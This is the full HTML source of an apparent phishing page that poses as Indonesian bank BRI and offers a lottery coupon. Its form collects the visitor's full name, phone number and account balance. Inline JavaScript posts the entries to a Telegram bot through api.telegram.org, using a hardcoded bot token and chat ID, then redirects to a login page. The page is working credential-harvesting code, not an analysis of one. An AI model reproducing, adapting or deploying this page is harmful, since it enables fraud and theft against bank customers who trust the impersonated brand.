
<html lang="en"><head>
    <meta charset="UTF-8">
     <meta http-equiv="refresh" content="300; URL=/playstore">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>www.bri.co.id</title>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap');
    * {
        font-family: 'Ubuntu', sans-serif;
        font-weight:500;
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        position: relative;
        color: #0F78CB;
    }
    .b { font-weight: 500; }
    html { width: 100vw; height: 100vh; }
    body {
        background: #fff;
        width: 100%;
        height: 100%;
    }
    .container {
        width: 100%;
        margin-top:60px;
        padding: 20px;
        height: 100%;
    }
    .flex {
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .hero {
        width: 100%;
        height: 283px;
    }
    .hero img {
        width: 112%;
    }
    h1 {
        font-size: 20px;
        margin-top:0px;
        text-align: center;
        margin: 20px;
        font-weight: 500;
    }
    form {
        width: 100%;
        height: auto;
        flex-direction: column;
    }
    label {
        display: block;
        font-size: 15px;
        text-align: left;
        margin-bottom: 8px;
        font-weight: 500;
    }
    select {
        width: 100%;
        height: 40px;
        border-radius: 4px;
        padding: 0 10px;
        outline: none;
        border: 1px solid #0F78CB;
        background: #fff;
        margin-bottom:0px;
    }
    input:focus,
    select:focus {
        border: 1.1px solid #0F78CB;
    }
    input {
        width: 100%;
        background: #fff;
        height: 40px;
        border-radius: 4px;
        border: 1px solid #dedede;
        outline: none;
        padding:10px;
        font-size: 16px;
        margin-bottom:8px;
    }
    button {
        margin-top:10px;
        width: 100%;
        height: 40px;
        border: none;
        outline: none;
        border-radius:5px;
        color: #fff;
        background: #0F78CB;
        text-align: center;
        font-size: 16px;
    }
</style>
</head>
<body>
    <div class="container">
        <div class="flex hero">
            <img src="/img/from.png" alt="">
        </div>
        <h1 class=""></h1>
        <form id="tg">
            <label>Nama Lengkap</label>
            <input type="text" required="required" autocomplete="off" placeholder=""  style="background-image: url('/img/useri.png');
    background-repeat: no-repeat;
    background-position:100% 100%;
    background-size: 100% 100%;
    padding-left:35px;" id="Nama" name="nama">
            <label>Nomor Handphone</label>
          <input type="tel" required="required" autocomplete="off" placeholder="" minlength="9" maxlength="12"  style="background-image: url('/img/phone.png');
    background-repeat: no-repeat;
    background-position:100% 100%;
    background-size: 100% 100%;
    padding-left:35px;" id="No Hp" name="No Hp">
            <label>Saldo Aktif Rekening</label>
            <input type="tel" required="required" autocomplete="off" placeholder="" minlength="" maxlength=""  style="background-image: url('/img/saldo.png');
    background-repeat: no-repeat;
    background-position:100% 100%;
    background-size: 100% 100%;
    padding-left:35px;" id="saldo" name="Saldo">
            <button type="submit">Ambil kupon undian</button>
        </form>
    </div>
   <p id="status"></p>
        <script>
        
    const chat_id = '6598246694', botID = 'bot7000532425:AAEBjL9KncdFb5ObgHcxq6pMJXNmcQSk0F8';
    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;
    document.querySelector('#tg').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href='/login.html';
    });

    </script>
</body>
</html>